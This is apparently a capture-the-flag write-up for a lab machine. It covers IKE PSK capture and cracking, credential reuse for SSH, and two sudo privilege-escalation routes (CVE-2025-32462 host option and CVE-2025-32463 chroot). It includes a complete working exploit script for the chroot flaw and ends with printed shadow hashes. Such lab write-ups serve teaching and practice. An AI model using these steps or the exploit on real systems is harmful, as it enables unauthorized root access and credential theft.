Enum

On this machine a TCP scan alone is not enough: TCP only exposes SSH, so a UDP scan is also needed — that is what surfaces the IKE/ISAKMP service on port 500 (the "500/tcp closed" line from nmap's follow-up is expected, the service is UDP-only; ike-scan below confirms it).

$ export IP=10.129.238.52
$ rustscan --ulimit 10000 -a $IP -- -sCTV -Pn; rustscan --udp -a $IP --ulimit 5000
 
*snip*
 
Open 10.129.238.52:22
 
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Open 10.129.238.52:500
 
PORT    STATE  SERVICE REASON
500/tcp closed isakmp  reset ttl 63

User

$ ike-scan -M -A -P -R $IP
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.238.52	Aggressive Mode Handshake returned
	HDR=(CKY-R=a2de72105ab132d4)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
	KeyExchange(128 bytes)
	Nonce(32 bytes)
	ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
	VID=09002689dfd6b712 (XAUTH)
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
	Hash(20 bytes)
 
IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
c4a410bbd91162a544ad85cfad85630f9e18970d767b999f037af8409ed4b1212ebfcec3300c0bf2dfaafb999bfde2e335d900fa94560419f07e64fde75745a6f104f70eeff10ffb1ea8398d3692a5605a75eceb105c9c12494486bd6bdbae6767ee6399253e454641a18409a0d921c69059a40bf926fdc4a9db4b09f099ddac:35ea9e821c9f8e40ce3ec880b11153a6c364c3e587bdc281333439dd41bafdd324c6c68164b2eaae7e49634ff464fdc03950f3ff5c10fb5a0dc7234735bb05a43f16a7e70c06a0df14ea669fbb36cff9094b3f7ab72879deb3b279e8f18b943aa74859b860dfff50563752cc6315e80cd1a7fa7bfef57f3e6acd49f54062be8b:a2de72105ab132d4:2408bc067f49a52b:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:d6239eba25fb713efa73db0f3a6792c4568e8146:c22056d15f7b306dce339cacab61165732b15d907cd1c592630f910cef951257:de5cb205253b8f980ad8bc0ffba2b4259bcf3aa2
Ending ike-scan 1.9.6: 1 hosts scanned in 0.062 seconds (16.20 hosts/sec).  1 returned handshake; 0 returned notify

User Account

ike@expressway.htb

  • Every Aggressive Mode handshake uses fresh cookies and nonces, so the PSK parameter string differs each run — paste the output of your own `-P` run (or use `-Phash.txt` to have ike-scan write it to a file directly) rather than the one below. The ID payload also leaks the user identity `ike@expressway.htb`, which gives both the username and the domain.
$ echo '2640570a53a6efed22e0750a005e31e84e91b7d38cf1a092cc4364cec667edc06fe91acd1d4879f3a7c13c390659beb7788c29f3e71ae54ddffe453d7eb2a04e1d5c2a33e3db3306bbd22bf141f6e7944730b6bd2a3b618a6d537ceb536dc68b9674a1aeaa69a9e851a3338bb7caafe813eb4cddd503708529938e25d60be7f6:4f975f9784e571eb46975aaac3bab7ce1b803f52afa81fff83961cba01a54fc5088caaf083506c6c46b237dd814ce469bf10873f3c51cd3a2f9cd43dd6b568cc949b3e4560a08acc694fa46a1f43704b7b49be4e137f596af1e1b3a3ced470f8f7bf02cd045bf20e9be04e468c3a3d851d26ef342cc9c9379481bd5402ae9d02:fd979768b7598749:6739d06bc0d42dfc:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:36af7a7b34a9043172a1232b00a46a1e293a439c:39a26abc795984ac51975c7e00bad137ce486fc895879a32dc56699f9c9f512b:af3c54b27bd43cb822e41f5f7a55ea45d9886994' > hash.txt
 
$ psk-crack -d /usr/share/wordlists/rockyou.txt hash.txt
 
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash af3c54b27bd43cb822e41f5f7a55ea45d9886994
Ending psk-crack: 8045040 iterations in 3.916 seconds (2054489.54 iterations/sec)
  • SSH in as ike — the cracked IKE PSK is reused as the account's SSH password (credential reuse between the VPN and the shell account). Passing it with `-p` puts the secret in `ps` and shell history; `SSHPASS='…' sshpass -e ssh ike@expressway.htb` avoids that.
$ sshpass -p 'freakingrockstarontheroad' ssh ike@expressway.htb

Root

  • No sudo for this host: `sudo -v` is refused, and note the wording "on expressway" — sudoers rules are scoped to a hostname, which matters later.
ike@expressway:~$ sudo -v
Sorry, user ike may not run sudo on expressway.
  • id reveals we are in proxy group
  • Search for files/dirs under proxy privs
ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
 
ike@expressway:~$ find / -group proxy -ls 2>/dev/null
 1197      0 drwxr-xr-x   2 proxy    proxy          40 Sep 20 21:01 /run/squid
17693      4 drwxr-xr-x   2 proxy    proxy        4096 Sep 16 16:02 /var/spool/squid
15362      0 -rw-r-----   1 proxy    proxy           0 May 16 01:24 /var/spool/squid/netdb.state
17150      4 drwxr-xr-x   2 proxy    proxy        4096 Sep 16 16:02 /var/log/squid
17151      4 -rw-r-----   1 proxy    proxy         941 Jul 23 01:47 /var/log/squid/cache.log.2.gz
17195      4 -rw-r-----   1 proxy    proxy          20 Jul 22 19:32 /var/log/squid/access.log.2.gz
17207      4 -rw-r-----   1 proxy    proxy        2192 Jul 23 01:47 /var/log/squid/cache.log.1
17222      8 -rw-r-----   1 proxy    proxy        4778 Jul 23 01:19 /var/log/squid/access.log.1
  • We see some log files for Squid
  • Reading access.log.1 reveals a second hostname that the proxy was asked to reach
ike@expressway:~$ cat /var/log/squid/access.log.1
1753229566.990      0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229580.379      0 192.168.68.50 NONE_NONE/000 0 - error:transaction-end-before-headers - HIER_NONE/- -
1753229580.417     15 192.168.68.50 NONE_NONE/400 3896 GET / - HIER_NONE/- text/html
*snip*
 
1753229688.902      0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html
 
*snip*
1753229760.722      0 192.168.68.50 NONE_NONE/400 3908 GET /frand2 - HIER_NONE/- text/html
  • 403 3807 GET http://offramp.expressway.htb
  • `TCP_DENIED/403` is Squid's ACL refusing to proxy that request; it does not prove the host exists or is reachable, it only leaks a second hostname, `offramp.expressway.htb`, that the environment knows about and that is worth trying wherever hostnames are evaluated.
  • Recall Sorry, user ike may not run sudo on expressway.
  • Maybe we can get off the expressway, and use the offramp now.
ike@expressway:~$ sudo -h
sudo - execute a command as another user
 
usage: sudo -h | -K | -k | -V
usage: sudo -v [-ABkNnS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-ABkNnS] [-g group] [-h host] [-p prompt] [-U user]
            [-u user] [command [arg ...]]
usage: sudo [-ABbEHkNnPS] [-C num] [-D directory]
            [-g group] [-h host] [-p prompt] [-R directory] [-T timeout]
            [-u user] [VAR=value] [-i | -s] [command [arg ...]]
usage: sudo -e [-ABkNnS] [-C num] [-D directory]
            [-g group] [-h host] [-p prompt] [-R directory] [-T timeout]
            [-u user] file ...
 
Options:
  -A, --askpass                 use a helper program for password prompting
  -b, --background              run command in the background
  -B, --bell                    ring bell when prompting
  -C, --close-from=num          close all file descriptors >= num
  -D, --chdir=directory         change the working directory before running
                                command
  -E, --preserve-env            preserve user environment when running command
      --preserve-env=list       preserve specific environment variables
  -e, --edit                    edit files instead of running a command
  -g, --group=group             run command as the specified group name or ID
  -H, --set-home                set HOME variable to target user`s home dir
  -h, --help                    display help message and exit
  -h, --host=host               run command on host (if supported by plugin)
  -i, --login                   run login shell as the target user; a command
                                may also be specified
  -K, --remove-timestamp        remove timestamp file completely
  -k, --reset-timestamp         invalidate timestamp file
  -l, --list                    list user`s privileges or check a specific
                                command; use twice for longer format
  -n, --non-interactive         non-interactive mode, no prompts are used
  -P, --preserve-groups         preserve group vector instead of setting to
                                target`s
  -p, --prompt=prompt           use the specified password prompt
  -R, --chroot=directory        change the root directory before running command
  -S, --stdin                   read password from standard input
  -s, --shell                   run shell as the target user; a command may
                                also be specified
  -T, --command-timeout=timeout terminate command after the specified time limit
  -U, --other-user=user         in list mode, display privileges for user
  -u, --user=user               run command (or edit file) as specified user
                                name or ID
  -V, --version                 display version information and exit
  -v, --validate                update user`s timestamp without running a
                                command
  --                            stop processing command line arguments
  • `sudo -h host` asks the policy plugin to evaluate the sudoers rules for that host name instead of the local one. Officially the sudoers plugin only honours `-h` for listing (`-l`); in affected versions (this box runs 1.9.17, before the 1.9.17p1 fix) it also applies the remote host's rules when running a command — this is the behaviour tracked as CVE-2025-32462.
  • We saw a second hostname in the Squid log, so check it first with `sudo -l -h offramp.expressway.htb`; if a rule exists for that host, run the command against it.
  • Need to pass `-i` or `-u root <CMD>` to actually get root rather than just a listing.
ike@expressway:~$ sudo -h offramp.expressway.htb -i
root@expressway:~$ id
uid=0(root) gid=0(root) groups=0(root)
 
OR
 
ike@expressway:~$ sudo -h offramp.expressway.htb -u root bash
root@expressway:/home/ike$
 
OR
 
ike@expressway:~$ sudo -h offramp.expressway.htb -u root /bin/sh -c 'cat /root/*.txt'
39a5f4ca65efe873121c191e5bab5678

Root2

Likely unintended: sudo 1.9.17 is in the range affected by CVE-2025-32463 (the `sudo -R`/chroot + nsswitch.conf local root, reported fixed in 1.9.17p1), so the public PoC works regardless of whatever sudoers rule the intended path relies on. It requires `gcc` on the target.

ike@expressway:~$ sudo --version
 
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
 
ike@expressway:~$ nano pwn.sh
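#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
#                  @ Stratascale Cyber Research Unit (CRU)
#
# What this file sets up: a staging directory containing
#   woot/etc/nsswitch.conf  -> "passwd: /woot1337"
#   libnss_/woot1337.so.2   -> shared object whose constructor execs bash as root
# and then runs `sudo -R woot woot`, i.e. sudo with the chroot option pointed at
# the attacker-controlled directory. Per the advisory, affected sudo versions
# (1.9.14–1.9.17, fixed in 1.9.17p1) apply the chroot before user/group lookup,
# so glibc reads our nsswitch.conf, builds the module name libnss_/woot1337.so.2
# (the slash makes it a path relative to the current directory) and loads our
# library as root.
#
# Requirements: gcc on the target, sudo in the affected range (check
# `sudo --version`). Leaves nothing behind: the staging directory is removed on
# every exit path, including after the spawned root shell closes.
set -u

stage=$(mktemp -d /tmp/sudowoot.stage.XXXXXX) || exit 1

# Clean up on any exit (gcc failure, Ctrl-C, or after the root shell exits) so
# the exploit artefacts do not linger in /tmp. :? refuses to run if stage is
# somehow empty, so this can never expand to `rm -rf -- /`.
cleanup() { rm -rf -- "${stage:?}"; }
trap cleanup EXIT

# The library path derived from nsswitch.conf is resolved relative to cwd, so
# everything from here on must run from inside the staging directory.
cd -- "${stage}" || exit 1

command -v gcc >/dev/null 2>&1 || {
  printf 'gcc not found on target; cannot build the NSS module\n' >&2
  exit 1
}

# Quoted delimiter: the C source is written verbatim, no shell expansion.
cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

mkdir -p woot/etc libnss_
# glibc turns "/woot1337" into the module name libnss_/woot1337.so.2.
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
# Presumably so group lookups inside the chroot still resolve — kept from the
# original PoC; TODO confirm whether it is strictly required.
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c || exit 1

echo "woot!"
# The command ("woot") is irrelevant; the user lookup sudo performs inside the
# chroot is what loads the library. Its constructor execs /bin/bash as root,
# and the EXIT trap removes the staging directory once that shell exits.
sudo -R woot woot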
  • Make it executable and run it; the root shell lands in `/` because the constructor does `chdir("/")`, and the staging directory is deleted once that shell exits. Note the resulting shell keeps the `proxy` and `ike` supplementary groups, since only the uid/gid are reset.
ike@expressway:~$ chmod +x pwn.sh
ike@expressway:~$ ./pwn.sh
woot!
 
root@expressway:/$ id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
root@expressway:~# cat /etc/shadow
 
root:$y$j9T$u0cgimzO/m87OQdCkETl10$mTZSmVXBn10OJT7qVqvlEr7OwC0QppltyX33WH1esn7:20229:0:99999:7:::
ike:$y$j9T$iACv1qBHXsR1j0yqIsVwY.$udBwggnZtUPt/0TNMIhsU4TDrQm2tCzTr6xUE0ilPQ4:20292:0:99999:7:::